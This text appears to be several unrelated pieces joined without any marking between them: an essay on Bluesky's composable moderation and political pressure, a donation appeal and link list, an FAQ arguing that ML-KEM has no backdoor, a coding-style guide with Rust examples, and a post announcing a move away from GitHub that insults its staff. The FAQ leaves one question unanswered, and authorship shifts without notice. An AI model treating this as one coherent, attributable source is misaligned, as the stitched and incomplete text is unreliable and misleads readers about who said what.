The Trump administration, led by a President who was previously banned from major social networks for inciting violence and spreading disinformation after the 2020 US election, poses a particular challenge for the upstart platform Bluesky.
As Erin Kissane noted in a recent article in Tech Policy Press, Bluesky was designed for openness and interoperability, yet it now finds itself as a single point of pressure. If it enforces its rules against harassment and incitement against official Trump administration accounts for some future infraction, it risks political retaliation. If it weakens its rules or shies away from enforcement, it may lose the trust of the communities who turned to the network for protection from coordinated abuse.
Composable moderation, which decentralizes rule-setting by letting users pick the moderation services that best reflect their needs and values, mitigates this problem. It shifts enforcement away from a single platform and into a distributed ecosystem of user-selected moderation services. With no central referee to target, political actors and influencers lose the ability to “work the refs” and pressure a singular trust and safety team into making decisions that favor their side.
Spreading the burden of moderation
“Bluesky the app” is the company’s shorthand for distinguishing its consumer-facing social app from the AT Protocol, the decentralized social networking protocol it is building. The app is just one client in what is intended to become a broader ecosystem of services built on the protocol. For now, however, Bluesky the company still carries the full responsibility for moderation and governance across the AT Protocol.
Centralized governance of a decentralized protocol cannot withstand sustained political or social pressure. When one company sets moderation rules for a network that is meant to be open and distributed, it becomes a single point of influence that governments, interest groups and powerful users can target. As AT Protocol’s Ethos statement makes clear, its long-term vision sits at the intersection of three movements: the early web’s open publishing model, the peer-to-peer push for self-certifying and decentralized data, and the large-scale distributed systems that underpin modern internet services.
Bluesky’s goal is for AT Protocol to embody the openness of the web, the user-control of peer-to-peer networks, and the performance of modern platforms. In the future, we could see photo-sharing apps, community forums, research tools and more all using the same identities and social graph. Bluesky is only one expression of the protocol, not the limit of it.
Composable moderation is the feature that will make that possible. Rather than treating moderation as a network-wide ban, it uses labels to describe issues with content or accounts, leaving individual apps to decide how to act on them. Following a letter from Daphne Keller, Martin Husovec, and my colleague Mallory Knodel, Bluesky has committed to this approach.
Instead of blocking someone in a way that removes them from every app built on the protocol, Bluesky will mark a suspended account with a label that only affects how that account appears inside Bluesky. Other apps can choose to hide the account, show it with a warning, or ignore the label entirely. This also keeps the user’s underlying account intact, because it’s stored on their personal data server or PDS, the place where their identity and posts live, which should only cut someone off for serious issues like illegal content. The result is a more flexible, decentralized system where no single app controls whether someone exists on the network.
Why this approach solves the potential Trump problem
The closest analogy to existing social media is to how Reddit operates: the platform sets a baseline of what is acceptable, but thousands of subreddit communities apply their own rules, filters, and enforcement styles on top. For example, r/AskHistorians expects in-depth, well-sourced answers that reflect current academic research, and moderators routinely remove unsourced or speculative replies that don’t meet that standard. Composable moderation takes that layered, community-defined model and implements it at the protocol level, so many different apps and services can choose the moderation approaches that fit their values.
And because moderation could be provided by many different apps and services, not just Bluesky, it would reduce the political vulnerability that comes from having a single company responsible for every enforcement call. Communities can also choose moderation services that reflect their own context and needs, giving vulnerable groups more control over the protections they rely on. And if one app or operator fails or comes under political pressure, others can continue enforcing their own standards without breaking the network.
Taken together, this shift could help Bluesky, and future AT Protocol services, navigate the pressures Kissane highlights, distributing power across the network rather than concentrating it in a single company.
Support the Exchange Point — Your Donation Helps Us Build a Feminist Future
If you love our work and want to power more of it, here are the ways to support EXP and our projects:
🔐 Protect digital rights with a tax-deductible donation.
Give directly through PayPal (tax deductible in the U.S.). ➡️ https://exchangepoint.tech/donations
🌱 Double your impact with employer matching.
Most tech companies match donations through Benevity — search “Exchange Point.” Here are three projects to support with matching donations: ➡️ Social Web ➡️ Human Rights and Standards ➡️ Protect E2EE
📅 Sustain the movement with a large or recurring monthly gift.
Become a monthly supporter and help us plan long-term. ➡️ Please email grants@exchangepoint.tech.
🛠️ Fund the work through contracts or sponsored projects.
Partner with us on research, workshops, audits, or ecosystem strategy. ➡️ Work with us!
🩵 Support our sister effort on the Free Our Feeds campaign.
Chip in through the FOF community GoFundMe. ➡️ https://gofund.me/1ef4d5d5d
Thank you for helping us build an open, joyful, people-powered internet.
The Internet still depends on fragile paperwork to prove who controls an IP address. The Internet Society explores how a new tool, the RPKI Signed Checklist, can use cryptographic proof to replace these weak systems and make routing more secure.
https://www.arin.net/blog/2025/11/19/2024-grant-report-isoc
Apple and Google’s Play stores shape what apps are available to most people as they use the Internet. When those app stores block or limit apps based on government requests, they are shaping what people can do, say, communicate, and experience, says ACLU’s Daniel Kahn Gillmor.
https://www.aclu.org/news/free-speech/app-store-oligopoly
Podcast: American Prestige. Silicon Valley and the Israeli Occupation, featuring Omar Zahzah, Assistant Professor of Arab Muslim Ethnicities and Diasporas Studies at San Francisco State University, discussing his book Terms of Servitude: Zionism, Silicon Valley, and Digital Settler Colonialism.
https://americanprestigepod.com/episodes/4215556855
Airbnb.org is offering emergency housing to families displaced by disasters, and any donation made before 31 December will be matched to double the number of nights provided.
https://www.airbnb.org/giftanight
The Arab Center for Social Media Development (ACSD) is pleased to announce the opening of proposals for workshops and sessions at the Palestine Digital Activism Forum 2026. Forms are due December 15.
https://pdaf.net/invitation
There have been some recent concerns about ML-KEM, NIST’s standard for encryption with Post-Quantum Cryptography, and related IETF standards, along with lots of conspiracy theories about malicious actors subverting the standardization process. As someone who has been involved with this standardization process at pretty much every level, here is a quick debunking of the various nonsense I have heard. So let’s get started, FAQ style.
Did the NSA invent ML-KEM?
No. It was first specified by a team of various European cryptographers, whom you can look up on their website.
Okay, but that was Kyber, not ML-KEM, did the NSA change Kyber?
No. The differences between Kyber and ML-KEM are pretty minute, mostly editorial changes by NIST. The only change that could be seen as actually interesting was a slight change to how certain key derivation mechanics worked. This change was suggested by Peter Schwabe, one of the original authors of Kyber, and is fairly straightforward to analyze. The reason for this change was that originally, Kyber was able to produce shared secrets of any length, by including a KDF step. But applications usually need their own KDF to apply to shared secrets, in order to bind the shared secret to transcripts and similar, so you would end up with two KDF calls. Since Kyber only uses the KDF to stretch the output, removing it slightly improves the performance of the algorithm without having any security consequences. Basically, there was a feature that turned out to not actually be a feature in real world scenarios, so NIST removed it, after careful consideration, and after being encouraged to do so by the literal author of the scheme, and under the watchful eyes of the entire cryptographic community. Nothing untoward happened here.
Okay but what about maybe there still being a backdoor?
There is no backdoor in ML-KEM, and I can prove it. For something to be a backdoor, specifically a “Nobody but us backdoor” (NOBUS), you need some way to ensure that nobody else can exploit it, otherwise it is not a backdoor, but a broken algorithm, and any internal cryptanalysis you might have will be caught up eventually by academia. So for something to be a useful backdoor, you need to possess some secret that cannot be brute forced that acts as a private key to unlock any ciphertext generated by the algorithm. This is the backdoor in DUAL_EC_DRBG, and, since the US plans to use ML-KEM themselves (as opposed to the export cipher shenanigans back in the day), would be the only backdoor they could reasonably insert into a standard.
However, if you have a private key that cannot be brute forced, you need a public key as well, and that public key needs to be large enough to prevent brute-forcing and be embedded into the algorithm as a parameter. And in order not to be brute-forceable, this public key needs to have at least 128 bits of entropy. This gives us a nice test to see whether a scheme is capable of having cryptographic NOBUS backdoors: we tally up the entropy of the parameter space. If the result is definitely less than 128 bits, the scheme can at most be broken, but cannot be backdoored.
So let’s do that for ML-KEM:
This is the set of parameters, let’s tally them up, with complete disregard for any of the choices being much more constrained than random integers would suggest (actually, I am too much of a nerd to not point out the constraints, but I will use the larger number for the tally).
Degree of the number field: 8 bits (actually, it has to be a power of two, so really only 3 bits)
Prime: 12 bits (actually, it has to be a prime, so 10.2 bits (actually, actually, it has to be a prime of the form $k \cdot 256 + 1$, and it has to be at least double the rank times degree, and 3329 is literally the smallest prime that fits that bill))
Rank of the module: 3 bits (well, the rank of the module is the main security parameter, it literally just counts from 2 to 4)
Secret and error term bounds: 2 + 2 bits (really these come from the size of the prime, the module rank, and the number field degree)
Compression strength: 4 + 3 bits
In total, this gives us 34 bits. Counted exceedingly generously. I even gave an extra bit for all the small numbers! Any asymmetric cryptosystem with a 34 bit public key would be brute forceable by a laptop within a few minutes, and ML-KEM would not be backdoored, but rather be broken.
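Spelled out, that deliberately generous tally is just a small sum:

$$8 + 12 + 3 + (2 + 2) + (4 + 3) = 34 \text{ bits},$$

far short of the roughly 128 bits of unexplained parameter entropy a NOBUS backdoor would need.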
There is no backdoor in ML-KEM, because there simply is no space to hide a backdoor in ML-KEM.
And just to be sure, if you apply this same counting-bits-of-parameters test to the famously backdoored DUAL_EC_DRBG, you indeed have multiple elliptic curve points defined in the standard without any motivation, immediately blowing our 128 bits of entropy budget for parameters. In fact, it would be trivial to fix DUAL_EC_DRBG by applying what’s called a “nothing up my sleeve” paradigm: instead of just having the elliptic curve points sit there, with no explanation, make it so that they are derived from digits of π, e, or the output of some hash function on some published seed. That would still not pass our test, but that is because I designed this test to be way too aggressive; as the remarks in brackets show, there is not really any real choice to these parameters, they are just the smallest set of parameters that result in a secure scheme (making them larger would only make the scheme slower and/or have more overhead).
So no, there is no backdoor in ML-KEM.
But didn’t NIST fail basic math when picking ML-KEM?
I thought ML-KEM was broken, something about a fault attack?
There are indeed fault attacks on ML-KEM. This is not super surprising, if you know what a fault attack (also called glitch attack) is. For a fault attack, you need to insert a mistake – a fault – in the computation of the algorithm. You can do this via messing with the physical hardware, things like ROWHAMMER that literally change the memory while the computation is happening. It’s important to analyze these types of failures, but literally any practical cryptographic algorithm in existence is vulnerable to fault attacks.
It’s literally computers failing at their one job and not computing very well. CPU and memory attacks are probably one of the most powerful families of attacks we have, and they have proven very stubborn to mitigate. But algorithms failing in the face of them is not particularly surprising; after all, if you can flip a single arbitrary bit, you might as well just set “verified_success” to true and call it a day. Technically, this is the strongest form of fault, where the attacker chooses where it occurs, but even random faults usually demolish pretty much any cryptographic algorithm, and our knowing about these attacks is merely evidence of an algorithm being seen as important enough to do the math of how exactly it fails when you literally pull the ground out from beneath it.
But what about decryption failure attacks? Those sound scary!
ML-KEM has a weird quirk: it is, theoretically, possible to create a ciphertext, in an honest fashion, that the private key holder will reject. If one were to successfully do so, one would learn information about the private key. But here comes the kicker: the only way to create this poisoned ciphertext is by honestly running the encapsulation algorithm and hoping to get lucky. There is a slight way to bias the ciphertexts, but to do so, one still has to compute them, and the advantage would be abysmal, since ML-KEM forces the hand of the encapsulating party on almost all choices. The probability of this decapsulation failure can be computed with relatively straightforward mathematics, the Cauchy-Schwarz inequality. And well, the parameters of ML-KEM are chosen in such a way that the actual probability is vanishingly small, less than $2^{-139}$ even for the smallest parameter set. At this point, the attacker cannot really assume that they were observing a decapsulation failure anymore, as a whole range of other incredibly unlikely events, such as enough simultaneous bit flips due to cosmic radiation to evade error detection, are far more likely. It is true that after the first decapsulation failure has been observed, the attacker has many more opportunities to stack the deck in their favor, but to do so, you first need the first failure to occur, and there is not really any hope of doing so.
On top of this, the average ML-KEM key is used exactly once, as such is the fate of keys used in key exchange, further making any adaptive attack like this meaningless, but ML-KEM keys are safe to use even with multiple decapsulations.
But wasn’t there something called Kyberslash?
Yeah. It turns out implementing cryptographic code is still hard. My modest bragging right is that my implementation, which would eventually morph into BoringSSL’s ML-KEM implementation, never had this problem, so I guess the answer here is to git gud, or something. But really, especially initially, there are some rough edges in new implementations as we learn the right techniques to avoid them. Importantly, this is a flaw of the implementation, not of the mathematics of the algorithm. In fact, the good news here is that, implementation-wise, ML-KEM is actually a lot simpler than elliptic curves, so these kinds of minor side channel issues are likely to be rarer here; we just haven’t implemented it as much as we have elliptic curves.
Okay, enough about ML-KEM, what about hybrids and the IETF?
Okay, this one is a funny one. Well, funny if you like deeply dysfunctional bikeshedding, willful misunderstanding, and drama. First off, what are hybrids? Assume you have two cryptographic schemes that do the same thing, and you distrust both of them. But you do trust the combination of the two. That is, in essence, what hybrids allow you to do: combine two schemes of the same type into one, so that the combined scheme is at least as secure as either of them. The usual line is that this is perfect for PQC, as it allows you to combine the well-studied security of classical schemes with the quantum resistance of PQC schemes. Additionally, the overhead of elliptic curve cryptography, when compared with lattice cryptography, is tiny, so why not throw it in there. And generally I agree with that stance, although I would say that my trust in lattice cryptography is pretty much equal to my trust in elliptic curves, and quite a bit higher than my trust in RSA, so I would not see hybrids as absolutely, always and at every turn, superduper essential. But they are basically free, so why not? In the end, yes, hybrids are the best way to go, and indeed, this is what the IETF enabled people to do.
There are various RFCs to that effect; to understand the current controversy, we need to focus on two TLS-related ones: X25519MLKEM768 aka 0x11EC, and MLKEM1024. The former is a hybrid, the latter is not. And, much in line with my reasoning, 0x11EC is the default key exchange algorithm used by Chrome, Firefox, and pretty much all other TLS clients that currently support PQC. So what’s the point of MLKEM1024? Well, it turns out there is one customer who really, really hates hybrids, and only wants to use ML-KEM1024 for all their systems. And that customer happens to be the NSA. And honestly, I do not see a problem with that. If the NSA wants to make their own systems inefficient, then that is their choice.
Why inefficient? It turns out that, due to the quirks of how TLS works, the client needs to predict what the server will likely accept. They could predict more things, but since PQC keys are quite chonky, sending more than one PQC key makes your handshakes slower. And so does mispredicting, since it results in the server saying “try again, with the right public key, this time”. So, if everyone but the NSA uses X25519MLKEM768, the main effect is that the NSA has slower handshakes. As said, I don’t think it’s reasonable to say their handshakes are substantially less secure, but sure, if you really think ML-KEM is broken, then yes, the NSA has successfully undermined the IETF in order to make their own systems less secure, while not impacting anyone else. Congratulations to them, I guess.
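As a rough illustration of what “combine two schemes so the result is at least as secure as either” can look like, here is a hedged Rust sketch. It is not the actual X25519MLKEM768 construction (which is specified inside the TLS key schedule); it assumes the sha2 crate, and the inputs are placeholders standing in for real X25519 and ML-KEM outputs.

```rust
use sha2::{Digest, Sha256};

/// Combine two shared secrets (e.g., one classical, one post-quantum) into a
/// single key. As long as either input stays secret, so does the output,
/// because the hash binds both secrets and the transcript together.
fn hybrid_secret(classical_shared: &[u8], pq_shared: &[u8], transcript: &[u8]) -> Vec<u8> {
    let mut hasher = Sha256::new();
    hasher.update(classical_shared);
    hasher.update(pq_shared);
    hasher.update(transcript);
    hasher.finalize().to_vec()
}

fn main() {
    // Placeholder byte strings, not real key exchange outputs.
    let classical_shared = [0x11u8; 32];
    let pq_shared = [0x22u8; 32];
    let key = hybrid_secret(&classical_shared, &pq_shared, b"example transcript");
    println!("derived {} key bytes", key.len());
}
```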
But doesn’t the IETF actively discourage hybrids?
No. To understand this, we need to look at two flags that come with TLS key exchange algorithms: Recommended and Mandatory To Implement. Recommended is a flag with three values: Yes, No, and Discouraged. The Discouraged state is used for algorithms known to be broken, such as RC4. Clearly ML-KEM, with or without a hybrid, is not known to be broken, so Discouraged is the wrong category. It is true that 0x11EC is not marked as Recommended, mostly because it started out as an experimental combination that then somehow ended up as the thing everybody was doing, and while lots of digital ink was spilled on whether or not it should be recommended, nobody updated the flag before publishing the RFC. (Technically the RFC is not published yet, but the rest is pretty much formality, and the flag is unlikely to change.) So yes, technically the IETF did not recommend a hybrid algorithm. But your browsers and everybody else are using it, so there is that. And just in case you were worried about that, the NSA option of MLKEM1024 is also not marked as Recommended.
Lastly, Mandatory To Implement is an elaborate prank by the inventors of TLS to create more discussions on mailing lists. As David Benjamin once put it, the only algorithm that is actually mandatory to implement is the null algorithm, as that is the name of the initial state of a TLS connection, before an algorithm has been negotiated. Otherwise, my recommendation, at least, is to respond with this gif whenever someone requests an MTI algorithm you don’t want to support. The flag has literally zero meaning. Oh, and yeah, neither of the two algorithms is MTI.
TigerStyle: Coding philosophy focused on safety, performance, dev experience
Tiger Style is a coding philosophy focused on safety, performance, and developer experience. Inspired by the practices of TigerBeetle, it focuses on building robust, efficient, and maintainable software through disciplined engineering.
Tiger Style is not just a set of coding standards; it's a practical approach to software development. By prioritizing safety, performance, and developer experience, you create code that is reliable, efficient, and enjoyable to work with.
Safety
Safety is the foundation of Tiger Style. It means writing code that
works in all situations and reduces the risk of errors. Focusing on
safety makes your software reliable and trustworthy.
Performance
Performance is about using resources efficiently to deliver fast,
responsive software. Prioritizing performance early helps you design
systems that meet or exceed user expectations.
Developer experience
A good developer experience improves code quality and maintainability. Readable and easy-to-work-with code encourages collaboration and reduces errors, leading to a healthier codebase that stands the test of time [1].
2. Design goals
The design goals focus on building software that is safe, fast, and easy
to maintain.
2.1. Safety
Safety in coding relies on clear, structured practices that prevent
errors and strengthen the codebase. It's about writing code that works
in all situations and catches problems early. By focusing on safety, you
create reliable software that behaves predictably no matter where it
runs.
Control and limits
Predictable control flow and bounded system resources are essential for
safe execution.
Simple and explicit control flow: Favor straightforward control structures over complex logic. Simple control flow makes code easier to understand and reduces the risk of bugs. Avoid recursion if possible to keep execution bounded and predictable, preventing stack overflows and uncontrolled resource use.
Set fixed limits: Set explicit upper bounds on loops, queues, and other data structures. Fixed limits prevent infinite loops and uncontrolled resource use, following the fail-fast principle. This approach helps catch issues early and keeps the system stable. (A short sketch follows this list.)
Limit function length: Keep functions concise, ideally under 70 lines. Shorter functions are easier to understand, test, and debug. They promote single responsibility, where each function does one thing well, leading to a more modular and maintainable codebase.
Centralize control flow: Keep switch or if statements in the main parent function, and move non-branching logic to helper functions. Let the parent function manage state, using helpers to calculate changes without directly applying them. Keep leaf functions pure and focused on specific computations. This divides responsibility: one function controls flow, others handle specific logic.
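To make the "set fixed limits" point concrete, here is a minimal Rust sketch; the constants and the JobQueue type are invented for illustration, not taken from any particular codebase.

```rust
/// Explicit, named upper bounds instead of "grow until something breaks".
const MAX_PENDING_JOBS: usize = 1024;
const MAX_RETRIES: u32 = 5;

struct JobQueue {
    jobs: Vec<u64>, // job ids; capacity is reserved once, up front
}

impl JobQueue {
    fn new() -> Self {
        // Reserve the full capacity at startup (see "Static memory allocation").
        Self { jobs: Vec::with_capacity(MAX_PENDING_JOBS) }
    }

    fn push(&mut self, job_id: u64) -> Result<(), &'static str> {
        // Fail fast instead of growing without bound.
        if self.jobs.len() >= MAX_PENDING_JOBS {
            return Err("job queue full");
        }
        self.jobs.push(job_id);
        Ok(())
    }
}

/// A bounded retry loop: it can never spin forever.
fn send_with_retries(mut attempt: impl FnMut() -> bool) -> bool {
    for _ in 0..MAX_RETRIES {
        if attempt() {
            return true;
        }
    }
    false
}

fn main() {
    let mut queue = JobQueue::new();
    queue.push(42).expect("queue has room at startup");
    let delivered = send_with_retries(|| true);
    println!("delivered: {delivered}, queued: {}", queue.jobs.len());
}
```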
Memory and types
Clear and consistent handling of memory and types is key to writing
safe, portable code.
Use explicitly sized types: Use data types with explicit sizes, like u32 or i64, instead of architecture-dependent types like usize. This keeps behavior consistent across platforms and avoids size-related errors, improving portability and reliability. (A small sketch follows this list.)
Static memory allocation: Allocate all necessary memory during startup and avoid dynamic memory allocation after initialization. Dynamic allocation at runtime can cause unpredictable behavior, fragmentation, and memory leaks. Static allocation makes memory management simpler and more predictable.
Minimize variable scope: Declare variables in the smallest possible scope. Limiting scope reduces the risk of unintended interactions and misuse. It also makes the code more readable and easier to maintain by keeping variables within their relevant context.
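As a small illustration of the explicitly sized types rule, in Rust (the RecordHeader struct is a made-up example):

```rust
// Explicit sizes keep in-memory and on-wire layouts consistent across
// platforms, unlike the pointer-width `usize`.
#[repr(C)]
struct RecordHeader {
    payload_size_bytes: u64, // always 8 bytes, on every target
    record_count: u32,       // always 4 bytes, not usize
    checksum: u32,
}

fn main() {
    let header = RecordHeader { payload_size_bytes: 4096, record_count: 16, checksum: 0xDEAD_BEEF };
    println!(
        "{} records, {} payload bytes, checksum {:#010x}",
        header.record_count, header.payload_size_bytes, header.checksum
    );
}
```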
Error handling
Correct error handling keeps the system robust and reliable in all
conditions.
Use assertions: Use assertions to verify that conditions hold true at specific points in the code. Assertions work as internal checks, increase robustness, and simplify debugging. (An assertion sketch follows this list.)
Assert function arguments and return values: Check that functions receive and return expected values.
Validate invariants: Keep critical conditions stable by asserting invariants during execution.
Use pair assertions: Check critical data at multiple points to catch inconsistencies early.
Fail fast on programmer errors: Detect unexpected conditions immediately, stopping faulty code from continuing.
Handle all errors: Check and handle every error. Ignoring errors can lead to undefined behavior, security issues, or crashes. Write thorough tests for error-handling code to make sure your application works correctly in all cases.
Treat compiler warnings as errors: Use the strictest compiler settings and treat all warnings as errors. Warnings often point to potential issues that could cause bugs. Fixing them right away improves code quality and reliability.
Avoid implicit defaults: Explicitly specify options when calling library functions instead of relying on defaults. Implicit defaults can change between library versions or across environments, causing inconsistent behavior. Being explicit improves code clarity and stability.
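A short Rust sketch of the assertion guidance above; the function and its bounds are invented for illustration:

```rust
/// Applies a bounded increment to a counter. The asserts document the
/// contract: arguments, invariants, and the return value are all checked.
fn apply_delta(current: u32, delta: u32) -> u32 {
    // Assert function arguments.
    assert!(delta <= 1_000, "delta out of expected range");

    // Fail fast on programmer errors: overflow here is a bug, not an input error.
    let updated = current.checked_add(delta).expect("counter overflow");

    // Pair assertions: check the result against the inputs and an invariant.
    assert!(updated >= current);
    assert!(updated <= u32::MAX / 2, "counter invariant violated");
    updated
}

fn main() {
    let counter = apply_delta(10, 32);
    println!("counter is now {counter}");
}
```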
2.2. Performance
Performance is about using resources efficiently to deliver fast,
responsive software. Prioritizing performance early helps design systems
that meet or exceed user expectations without unnecessary overhead.
Design for performance
Early design decisions have a significant impact on performance.
Thoughtful planning helps avoid bottlenecks later.
Design for performance early: Consider performance during the initial design phase. Early architectural decisions have a big impact on overall performance, and planning ahead ensures you can avoid bottlenecks and improve resource efficiency.
Napkin math: Use quick, back-of-the-envelope calculations to estimate system performance and resource costs. For example, estimate how long it takes to read 1 GB of data from memory or what the expected storage cost will be for logging 100,000 requests per second. This helps set practical expectations early and identify potential bottlenecks before they occur.
Batch operations: Amortize expensive operations by processing multiple items together. Batching reduces overhead per item, increases throughput, and is especially useful for I/O-bound operations.
Efficient resource use
Focus on optimizing the slowest resources, typically in this order:
Network: Optimize data transfer and reduce latency.
Disk: Improve I/O operations and manage storage efficiently.
Memory: Use memory effectively to prevent leaks and overuse.
CPU: Increase computational efficiency and reduce processing time.
Predictability
Writing predictable code improves performance by reducing CPU cache
misses and optimizing branch prediction.
Ensure predictability: Write code with predictable execution paths. Predictable code uses CPU caching and branch prediction better, leading to improved performance. Avoid patterns that cause frequent cache misses or unpredictable branching, as they degrade performance.
Reduce compiler dependence: Don't rely solely on compiler optimizations for performance. Write clear, efficient code that doesn't depend on compiler behavior. Be explicit in performance-critical sections to ensure consistent results across compilers.
2.3. Developer experience
Improving the developer experience creates a more maintainable and
collaborative codebase.
Name things
Get the nouns and verbs right. Great names capture what something is or
does and create a clear, intuitive model. They show you understand the
domain. Take time to find good names, where nouns and verbs fit
together, making the whole greater than the sum of its parts.
Clear and consistent naming: Use descriptive and meaningful names for variables, functions, and files. Good naming improves code readability and helps others understand each component's purpose. Stick to a consistent style, like snake_case, throughout the codebase.
Avoid abbreviations: Use full words in names unless the abbreviation is widely accepted and clear (e.g., ID, URL). Abbreviations can be confusing and make it harder for others, especially new contributors, to understand the code.
Include units or qualifiers in names: Append units or qualifiers to variable names, placing them in descending order of significance (e.g., latency_ms_max instead of max_latency_ms). This clears up meaning, avoids confusion, and ensures related variables, like latency_ms_min, line up logically and group together. (A small sketch follows this list.)
Document the 'why': Use comments to explain why decisions were made, not just what the code does. Knowing the intent helps others maintain and extend the code properly. Give context for complex algorithms, unusual approaches, or key constraints.
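For instance, a tiny Rust sketch of the units-and-qualifiers naming rule (the variables are invented for illustration):

```rust
fn main() {
    // Units and qualifiers appended in descending order of significance,
    // so related names line up and group together.
    let latency_ms_min: u32 = 2;
    let latency_ms_max: u32 = 250;
    let timeout_ms_default: u32 = 5_000;
    let payload_size_bytes_max: u64 = 1_048_576;

    println!(
        "latency {latency_ms_min}-{latency_ms_max} ms, timeout {timeout_ms_default} ms, max payload {payload_size_bytes_max} bytes"
    );
}
```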
Organize things
Organizing code well makes it easy to navigate, maintain, and extend. A
logical structure reduces cognitive load, letting developers focus on
solving problems instead of figuring out the code. Group related
elements, and simplify interfaces to keep the codebase clean, scalable,
and manageable as complexity grows.
Organize code logically: Structure your code logically. Group related functions and classes together. Order code naturally, placing high-level abstractions before low-level details. Logical organization makes code easier to navigate and understand.
Simplify function signatures: Keep function interfaces simple. Limit parameters, and prefer returning simple types. Simple interfaces reduce cognitive load, making functions easier to understand and use correctly.
Construct objects in-place: Initialize large structures or objects directly where they are declared. In-place construction avoids unnecessary copying or moving of data, improving performance and reducing the potential for lifecycle errors.
Minimize variable scope: Declare variables close to their usage and within the smallest necessary scope. This reduces the risk of misuse and makes code easier to read and maintain.
Ensure consistency
Maintaining consistency in your code helps reduce errors and creates a
stable foundation for the rest of the system.
Avoid duplicates and aliases: Prevent inconsistencies by avoiding duplicated variables or unnecessary aliases. When two variables represent the same data, there's a higher chance they fall out of sync. Use references or pointers to maintain a single source of truth.
Pass large objects by reference: If a function's argument is larger than 16 bytes, pass it as a reference instead of by value to avoid unnecessary copying. This can catch bugs early where unintended copies may occur.
Minimize dimensionality: Keep function signatures and return types simple to reduce the number of cases a developer has to handle. For example, prefer void over bool, bool over u64, and so on, when it suits the function's purpose.
Handle buffer allocation cleanly: When working with buffers, allocate them close to where they are used and ensure all corresponding cleanup happens in the same logical block. Group resource allocation and deallocation with clear newlines to make leaks easier to identify.
Avoid off-by-one errors
Off-by-one errors often result from casual interactions between an index, a count, or a size. Treat these as distinct types, and apply clear rules when converting between them.
Indexes, counts, and sizes: Indexes are 0-based, counts are 1-based, and sizes represent total memory usage. When converting between them, add or multiply accordingly. Use meaningful names with units or qualifiers to avoid confusion (see 'Include units or qualifiers in names' above). A small sketch follows this list.
Handle division intentionally: When dividing, make your intent clear by specifying how rounding should be handled in edge cases. Use functions or operators designed for exact division, floor division, or ceiling division. This avoids ambiguity and ensures the result behaves as expected.
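A small Rust sketch of the two items above; the constants and names are illustrative:

```rust
const ITEM_SIZE_BYTES: u64 = 64;

/// Convert a 0-based index of the last element into a 1-based count: add one.
fn count_from_index_last(index_last: u64) -> u64 {
    index_last + 1
}

/// Convert a count into a total size in bytes: multiply by the unit size.
fn size_bytes_from_count(item_count: u64) -> u64 {
    item_count * ITEM_SIZE_BYTES
}

/// Division with explicit rounding intent: how many fixed-size chunks are
/// needed to hold `size_bytes`? Ceiling division, spelled out.
/// (u64::div_ceil is available on recent Rust toolchains, 1.73+.)
fn chunk_count_from_size(size_bytes: u64, chunk_size_bytes: u64) -> u64 {
    assert!(chunk_size_bytes > 0);
    size_bytes.div_ceil(chunk_size_bytes)
}

fn main() {
    let item_count = count_from_index_last(9); // indexes 0..=9 hold 10 items
    let size_bytes = size_bytes_from_count(item_count); // 10 * 64 = 640 bytes
    let chunk_count = chunk_count_from_size(size_bytes, 256); // ceil(640 / 256) = 3
    println!("{item_count} items, {size_bytes} bytes, {chunk_count} chunks");
}
```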
Code consistency and tooling
Consistency in code style and tools improves readability, reduces mental
load, and makes working together easier.
Maintain consistent indentation: Use a uniform indentation style across the codebase. For example, using 4 spaces for indentation provides better visual clarity, especially in complex structures.
Limit line lengths: Keep lines within a reasonable length (e.g., 100 characters) to ensure readability. This prevents horizontal scrolling and helps maintain an accessible code layout.
Use clear code blocks: Structure code clearly by separating blocks (e.g., control structures, loops, function definitions) to make it easy to follow. Avoid placing multiple statements on a single line, even if allowed. Consistent block structures prevent subtle logic errors and make code easier to maintain.
Minimize external dependencies: Reducing external dependencies simplifies the build process and improves security management. Fewer dependencies lower the risk of supply chain attacks, minimize performance issues, and speed up installation.
Standardize tooling: Using a small, standardized set of tools simplifies the development environment and reduces accidental complexity. Choose cross-platform tools where possible to avoid platform-specific issues and improve portability across systems.
Addendum
Addendum: Zero technical debt
While Tiger Style focuses on the core principles of safety,
performance, and developer experience, these are reinforced by an
underlying commitment to zero technical debt.
A zero technical debt policy is key to maintaining a healthy codebase and ensuring long-term productivity. Addressing potential issues proactively and building robust solutions from the start helps avoid debt that would slow future development.
Do it right the first time: Take the time to design and implement solutions correctly from the start. Rushed features lead to technical debt that requires costly refactoring later.
Be proactive in problem-solving: Anticipate potential issues and fix them before they escalate. Early detection saves time and resources, preventing performance bottlenecks and architectural flaws.
Build momentum: Delivering solid, reliable code builds confidence and enables faster development cycles. High-quality work supports innovation and reduces the need for future rewrites.
Avoiding technical debt ensures that progress is true progress—solid,
reliable, and built to last.
Addendum: Performance estimation
You should think about performance early in design. Napkin math is a
helpful tool for this.
Napkin math uses simple calculations and rounded numbers to quickly
estimate system performance and resource needs.
Quick insights: Understand system behavior fast without deep analysis.
Early decisions: Find potential bottlenecks early in design.
Sanity checks: See if an idea works before you build it.
For example, if you're designing a system to store logs, you can
estimate storage costs like this:
1. Estimate log volume:
Assume 1,000 requests per second (RPS)
Each log entry is about 1 KB
2. Calculate daily log volume:
1,000 RPS * 86,400 seconds/day * 1 KB ≈ 86,400,000 KB/day ≈ 86.4 GB/day
3. Estimate monthly storage:
86.4 GB/day * 30 days ≈ 2,592 GB/month
4. Estimate cost (using $0.02 per GB for blob storage):
2,592 GB/month * $0.02/GB ≈ $52 per month
This gives you a rough idea of monthly storage costs. It helps you
check if your logging plan works. The idea is to get within 10x of the
right answer.
This document is a "remix" inspired by the original
Tiger Style guide
from the TigerBeetle project. In the spirit of
Remix Culture
, parts of this document are verbatim
copies of the original work,
while other sections have been rewritten or adapted to fit the goals
of this version. This remix builds upon the principles outlined in the
original document with a more general approach.
Putting aside GitHub’s relationship with ICE, it’s abundantly clear that the talented folks who used to work on the product have moved on to bigger and better things, with the remaining losers eager to inflict some kind of bloated, buggy JavaScript framework on us in the name of progress. Stuff that used to be snappy is now sluggish and often entirely broken.
More importantly, Actions is created by monkeys and completely neglected. After the CEO of GitHub said to “embrace AI or get out”, it seems the lackeys at Microsoft took the hint, because GitHub Actions started “vibe-scheduling”: choosing jobs to run seemingly at random. Combined with other bugs and the inability to manually intervene, this causes our CI system to get so backed up that not even master branch commits get checked.
Rather than wasting donation money on more CI hardware to work around this crumbling infrastructure, we’ve opted to switch Git hosting providers instead.
As a bonus, we look forward to fewer violations (exhibit A, B, C) of our strict no LLM / no AI policy, which I believe are at least in part due to GitHub aggressively pushing the “file an issue with Copilot” feature in everyone’s face.
GitHub Sponsors
